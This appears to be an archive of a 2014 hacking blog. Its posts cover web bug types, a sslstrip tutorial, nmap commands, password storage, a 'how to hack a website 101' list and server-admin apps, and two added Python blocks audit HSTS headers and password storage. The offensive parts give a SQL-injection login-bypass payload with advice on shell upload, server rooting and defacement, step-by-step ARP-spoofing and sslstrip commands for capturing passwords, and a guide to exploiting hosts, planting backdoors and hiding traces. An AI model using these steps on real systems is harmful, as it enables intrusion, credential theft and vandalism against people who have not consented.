Tuesday 5 August 2014

WEB PENTESTING-

In web pentesting there are many types of bugs in websites, some of which are given below.
1.SQL injection-
This type of bug is for beginners, and a lot of websites have it. For that we can insert a command like the following in the input field
' or '1'='1
in both the username and the password, and after that you can bypass the cpanel of the website, upload your shell, and then use Metasploit for shared-server hacking. If a Linux server is used, you can then root the server or symlink that server.
2.SQLI-
This type of vulnerability is in the database of the website. For attacking it you can use Havij on a Windows machine (KIDDIES). If you work on Linux you can use sqlmap for database hacking. If you are a professional hacker you can use a browser-side, query-based attack on the target website. Once you have the admin username and password you can deface the site by using a shell like C99, R57, etc.
3.XSS-
This is a cross-site scripting attack, in which we can insert text into the target website that is either reflected on the browser side or stored in the website's database (server side).
4.Dir traversal-
It is a type of bug in which a sensitive link can be opened directly through the URL in the browser.
5.Remote code execution vulnerability-
A remote code execution attack is the result of either server-side or client-side security weaknesses. Vulnerable components may include libraries, remote directories on a server that haven't been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
Some examples are LFI, RFI, WebDAV remote code execution, the JCE exploit, etc.
6.DDOS-
DDoS, or Distributed Denial of Service, is where a server's or a machine's services are made unavailable to its users. Its usual agenda is to temporarily interrupt or completely take down a successfully running system.
A DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.
A botnet is popularly used for DDoS: with a botnet we can connect many clients, and after that we can flood the website.

how to use SSLstrip in kali linux:

what is sslstrip-
sslstrip is a MITM attack tool that allows an attacker to manipulate traffic and capture data such as usernames and passwords.
how it works-
It works by converting HTTPS requests into basic HTTP requests.
Step-1
Enable IP forwarding so our computer can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
Step-2
Now we need to configure iptables so that our computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
Step-3
Start ARP spoofing
arpspoof -i <interface> -t <target ip> -r <gateway ip>
Step-4
Now we need to run sslstrip in a new terminal (don't close the previous terminal)
sslstrip -l 8080
Note- you can also do ARP spoofing with ettercap
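
The downgrade described above only works while the browser is willing to speak plain HTTP to the site; the site's Strict-Transport-Security (HSTS) response header is what removes that option. The following is an added example, not part of the original post, that parses the header as RFC 6797 describes and reports what a given policy leaves uncovered; the sample headers, the function names and the 180-day floor are constructed assumptions.

```python
MIN_MAX_AGE = 15552000  # 180 days; an assumed policy floor, not from the post


def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797, section 6.1).
    Returns a dict, or None when a browser would ignore the header."""
    seen = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        name, val = name.strip().lower(), val.strip()
        if not name:
            continue                      # empty directive, e.g. ';;'
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]               # quoted-string form is allowed
        if name in seen:
            return None                   # a directive may appear only once
        seen[name] = val
    age = seen.get("max-age", "")
    if not (age.isascii() and age.isdigit()):
        return None                       # max-age is required and numeric
    return {"max_age": int(age),
            "include_subdomains": "includesubdomains" in seen,
            "preload": "preload" in seen}  # preload: de facto, not in the RFC


def stripping_findings(headers):
    """List what still lets a browser be downgraded to http:// for a site."""
    raw = next((v for k, v in headers.items()
                if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(raw) if raw is not None else None
    if policy is None:
        return ["no valid HSTS policy: plain HTTP is accepted on every visit"]
    findings = []
    if policy["max_age"] == 0:
        findings.append("max-age=0 tells the browser to forget the policy")
    elif policy["max_age"] < MIN_MAX_AGE:
        findings.append("max-age is shorter than 180 days")
    if not policy["include_subdomains"]:
        findings.append("subdomains are not covered")
    if not policy["preload"]:
        findings.append("the first visit is unprotected (host not preloadable)")
    return findings


# Constructed HTTPS response headers, for illustration only.
SAMPLES = {
    "none": {"Content-Type": "text/html"},
    "weak": {"strict-transport-security": "max-age=300"},
    "strong": {"Strict-Transport-Security":
               'max-age="63072000"; includeSubDomains; preload'},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(label, stripping_findings(hdrs))
```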

How Your Passwords Are Stored on the Internet

There are a number of ways a site can store
your password, and some are considerably
more secure than others. Here's a quick
rundown of the most popular methods, and
what they mean for the security of your
data.
Method One: Plain Text Passwords
How It Works: The simplest way a site can
store your password is in plain text. That
means somewhere on their server, there
exists a database with your username and
password in it in a human-readable form
(that is, if your password is testing123, it is
stored in the database as testing123). When
you enter your credentials on the site, it
checks them against the database to see if
they match. This is the worst possible
method, in security terms, and most
reputable web sites do not store passwords
in plain text. If someone hacks this database,
everyone's password is immediately
compromised.
Does My Strong Password Matter? No way.
No matter how long or strong your password
may be, if it's stored in plain text and the
site gets hacked, your password is easily
accessible to anyone, no work required. It
still matters in terms of hiding your
passwords from, say, your friends, or others
that could easily guess it, but it won't make
any difference if the site gets hacked.
Method Two: Basic Password Encryption
How It Works: To add more protection to
your password than plain text provides, most
sites encrypt your password before they
store it on their servers. Encryption, for
those of you that don't know, uses a special
key to turn your password into a random
string of text. If a hacker were to get hold of
this random string of text, they wouldn't be
able to log into your account unless they
also had the key, which they could then use
to decrypt it.
The problem is, the key is often stored on
the very same server that the passwords are,
so if the servers get hacked, a hacker doesn't
have to do much work to decrypt all the
passwords, which means this method is still
wildly insecure.
Does My Strong Password Matter? No. Since
it's easy to decrypt the password database
with a key, your strong password won't make
a difference here either. Again: this is in
terms of the site getting hacked; if you have
a nosy friend or family member rooting
through your stuff, a strong password can
help keep them from guessing it.
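
As an added example (not part of the original article), the code below shows why a strong password does not help under Method Two once the key leaks with the database. It goes beyond the two methods above by also storing a salted one-way hash, the case where password strength does start to matter. The key, the passwords, the function names and the toy cipher are constructed stand-ins.

```python
import hashlib
import hmac
import os

SERVER_KEY = b"constructed-key-kept-beside-the-database"  # constructed sample


def _toy_cipher(key, nonce, data):
    # Stand-in for a real cipher (HMAC-SHA256 keystream XOR), used only to
    # show that encryption is reversible by whoever holds the key.
    stream = b"".join(hmac.new(key, nonce + bytes([i]), hashlib.sha256).digest()
                      for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))


def store_encrypted(password):
    nonce = os.urandom(16)
    return nonce + _toy_cipher(SERVER_KEY, nonce, password.encode())


def recover_encrypted(record, key):
    # Method Two after a breach that exposes the key too: one decrypt call,
    # whatever the password's length or strength.
    return _toy_cipher(key, record[:16], record[16:]).decode()


def store_hashed(password, iterations=600_000):
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def check_hashed(password, record, iterations=600_000):
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record[:16], iterations)
    return hmac.compare_digest(digest, record[16:])


def found_by_guessing(record, wordlist, iterations=600_000):
    # A one-way hash has no decrypt step; a leaked record falls only if the
    # password is among the candidates someone is willing to try.
    return any(check_hashed(word, record, iterations) for word in wordlist)


if __name__ == "__main__":
    common = ["password", "123456", "testing123"]  # constructed short list
    for pw in ("testing123", "Vq7#long-constructed-passphrase-91"):
        enc, hashed = store_encrypted(pw), store_hashed(pw)
        print(repr(pw), "| decrypted with leaked key:",
              recover_encrypted(enc, SERVER_KEY) == pw,
              "| hash found by guessing:", found_by_guessing(hashed, common))
```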

Sunday 3 August 2014

The Nmap

Nmap, aka Network Mapper, is an open source and very versatile tool for network administrators. Nmap is used for exploring networks, performing security scans, network audits and finding open ports on remote machines. It scans for live hosts, operating systems, packet filters and open ports running on remote hosts.
Scan a System with Hostname and IP Address
1.Scan using Hostname
nmap server2.tecmint.com
2.Scan using IP Address
nmap 192.168.0.101
3.Scan using “-v” option (the “-v” option gives more detailed information about the remote machine)
nmap -v server2.tecmint.com
4.Scan Multiple Hosts
nmap 192.168.0.101 192.168.0.102 192.168.0.103
5.Scan a whole Subnet
nmap 192.168.0.*
6.Scan Multiple Servers using last octet of IP address
nmap 192.168.0.101,102,103
7.Scan an IP Address Range
nmap 192.168.0.101-110
8.Scan Network Excluding Remote Hosts
nmap 192.168.0.* --exclude 192.168.0.100
9.Scan OS information and Traceroute
nmap -A 192.168.0.101
10.Enable OS Detection with Nmap
nmap -O server2.tecmint.com
11.Scan a Host to Detect Firewall
nmap -sA 192.168.0.101
12.Scan a Host to check if it is protected by Firewall
nmap -PN 192.168.0.101
13.Find out Live hosts in a Network
nmap -sP 192.168.0.*
14.Perform a Fast Scan
nmap -F 192.168.0.101
15.Find Nmap version
nmap -V
16.Scan Ports Consecutively
nmap -r 192.168.0.101
17.Print Host interfaces and Routes
nmap --iflist
18.Scan for specific Port
nmap -p 80 server2.tecmint.com
19.Scan a TCP Port
nmap -p T:8888,80 server2.tecmint.com
20.Scan a UDP Port
nmap -sU -p 53 server2.tecmint.com
21.Scan Multiple Ports
nmap -p 80,443 192.168.0.101
22.Scan Ports by Network Range
nmap -p 80-160 192.168.0.101
23.Find Host Services version Numbers
nmap -sV 192.168.0.101
24.Scan remote hosts using TCP ACK (PA) and TCP Syn (PS)
nmap -PS 192.168.0.101
25.Scan Remote host for specific ports with TCP ACK
nmap -PA -p 22,80 192.168.0.101
26.Scan Remote host for specific ports with TCP Syn
nmap -PS -p 22,80 192.168.0.101
27.Perform a stealthy Scan
nmap -sS 192.168.0.101
28.Check most commonly used Ports with TCP Syn
nmap -sT 192.168.0.101
29.Perform a tcp null scan to fool a firewall
nmap -sN 192.168.0.101
Download link :- http://nmap.org/download.html

how to hack a website/computer 101

step 1 scan your target
step 2 find open ports that u can exploit
step 3 exploit them!
step 4 now you are in the system! fuck shit up
step 5 create a backdoor so you can easily access again
step 6 leave no trace of you. the more silent you get, the more you're able to hear. it's better to wait a while and see if you can access something else (like fb/email)
***** you are responsible for what u do. hacking is illegal. Good luck :)

Saturday 2 August 2014

Top Server And Admin Applications For Android And IPhone: android-vs-ios

No matter what the nature of your work is, whether you are a webmaster, server administrator or an IT professional, the ability to deal with your admin tasks and your server is your utmost priority. In this article, we are going to discuss the top five server and admin applications that are suitable for your iPhone and Android mobile gadgets.
1. AndFTP
For those who are not yet familiar with AndFTP, it serves as an SCP, FTP, SFTP and FTPS client. Moreover, AndFTP lets the user handle a number of FTP configurations, and it provides features like download, upload and sharing management. AndFTP also allows the user to delete, rename, open, or update permissions, and to run custom commands.
2. ConnectBot
ConnectBot acts as a Secure Shell client intended for Android users. It creates a secure connection through a shell, even when the gadget is at a remote distance, to transmit files and data back and forth to your phone. Furthermore, ConnectBot lets the user handle a number of SSH sessions, copy and paste between other applications, and build protected tunnels.
Jack Wallen, an award-winning writer at Linux.com, stated that ConnectBot is a must-have app; in fact he recommends this app to Linux admins who are using an Android phone.
3. ServerMonitor
ServerMonitor is an app intended for iPhone users. It uses the SSH protocol to link to machines remotely to assist with your workstation and server monitoring requirements. The multi-protocol support includes the following: FTP, SMTP, HTTP, IMAP, MySQL, HTTPS, DNS, POP3, Ping and SSH.
Although there are not many reviews of this app, the general response seems to be optimistic. Based on feedback from users, one thing they want added in the next update is the ability to view the list of all running processes and how much memory they occupy.
4. iSSH – SSH / VNC Console
The iSSH – SSH / VNC Console for iPhone is an SSH and Telnet emulator that is fully featured with ANSI, VT102, VT100, and VT220, incorporated with a tunneled X server, RDP client and VNC client. This app also has the ability to carry simultaneous connections with total terminal compatibility, an intuitive user interface, and configurable macro and key options.
5. Network Utility
Network Utility lets the user check the status of their server or websites through their Apple device or iPhone anywhere. Network Utility is fully featured with TCP/IP Port Scan, ping (ICMP Echo), IP address information, Whois Query, GeoIP Lookup, and more.
For me this is another iPhone app that seems to be gathering mixed reviews. Some users approve of its efficiency and its user friendliness, but other users complain that this app causes their device to freeze up, which can only be fixed by restarting the device. Users also object to the absence of subnet scans. The decision is still out on this app. But the best thing to do is to try it and experience how it holds up.